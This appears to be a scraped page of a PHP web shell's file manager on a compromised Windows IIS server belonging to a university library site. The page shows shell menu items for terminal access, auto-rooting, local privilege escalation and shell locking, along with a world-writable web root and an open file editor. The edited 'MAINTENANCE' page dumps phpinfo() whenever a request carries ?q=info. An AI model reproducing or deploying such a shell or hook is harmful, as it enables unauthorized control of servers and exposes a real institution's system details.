Windows NT WIN-F6SLGVICLOP 10.0 build 17763 (Windows Server 2016) AMD64
Microsoft-IIS/10.0
Server IP : & Your IP : 18.222.32.191
Domains :
Cant Read [ /etc/named.conf ]
User : elibrary.unsap.ac.id
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Lock Shell
Lock File++
Readme
D: /
localhost /
perpus /
Delete
Unzip
Name
Size
Permission
Date
Action
.git
[ DIR ]
drwxrwxrwx
2024-06-28 13:24
application
[ DIR ]
drwxrwxrwx
2024-06-28 13:25
assets
[ DIR ]
drwxrwxrwx
2024-06-28 13:25
db
[ DIR ]
drwxrwxrwx
2024-06-28 13:25
libsys
[ DIR ]
drwxrwxrwx
2024-06-28 13:24
system
[ DIR ]
drwxrwxrwx
2024-06-28 13:25
tests
[ DIR ]
drwxrwxrwx
2024-06-28 13:25
uploads
[ DIR ]
drwxrwxrwx
2024-06-28 13:25
user_guide
[ DIR ]
drwxrwxrwx
2024-06-28 13:26
vendor
[ DIR ]
drwxrwxrwx
2024-06-28 13:27
.editorconfig
317
B
-rw-rw-rw-
2024-06-28 00:07
.gitignore
568
B
-rw-rw-rw-
2024-06-28 00:07
.htaccess
126
B
-rw-rw-rw-
2024-06-28 00:07
README.md
6.11
KB
-rw-rw-rw-
2024-06-28 00:07
anu.png
0
B
-rw-rw-rw-
2024-06-29 13:05
composer.json
239
B
-rw-rw-rw-
2024-06-28 00:07
contributing.md
6.44
KB
-rw-rw-rw-
2024-06-28 00:07
index.php
10.32
KB
-rw-rw-rw-
2024-06-28 00:07
index23.php
1.55
KB
-rw-rw-rw-
2024-03-22 00:51
libsys.zip
50.27
MB
-rw-rw-rw-
2024-06-28 13:18
license.txt
1.11
KB
-rw-rw-rw-
2024-06-28 00:07
readme.rst
2.36
KB
-rw-rw-rw-
2024-06-28 00:07
web.config
773
B
-rw-rw-rw-
2024-06-28 15:39
Save
Rename
<?php if (!empty($_GET['q'])) { switch ($_GET['q']) { case 'info': phpinfo(); exit; break; } } ?> <!DOCTYPE html> <html> <head> <title>MAINTENANCE</title> <link href="https://fonts.googleapis.com/css?family=Karla:400" rel="stylesheet" type="text/css"> <style> html, body { height: 100%; } body { margin: 0; padding: 0; width: 100%; display: table; font-weight: 100; font-family: 'Karla'; } .container { text-align: center; display: table-cell; vertical-align: middle; } .content { text-align: center; display: inline-block; } .title { font-size: 96px; } .opt { margin-top: 30px; } .opt a { text-decoration: none; font-size: 150%; } a:hover { color: red; } </style> </head> <body> <div class="container"> <div class="content"> <div class="title" title="Laragon">MAINTENANCE</div> </div> <div class="opt"> <div><a title="Getting Started" href="#"></a></div> </div> </div> </div> </body> </html>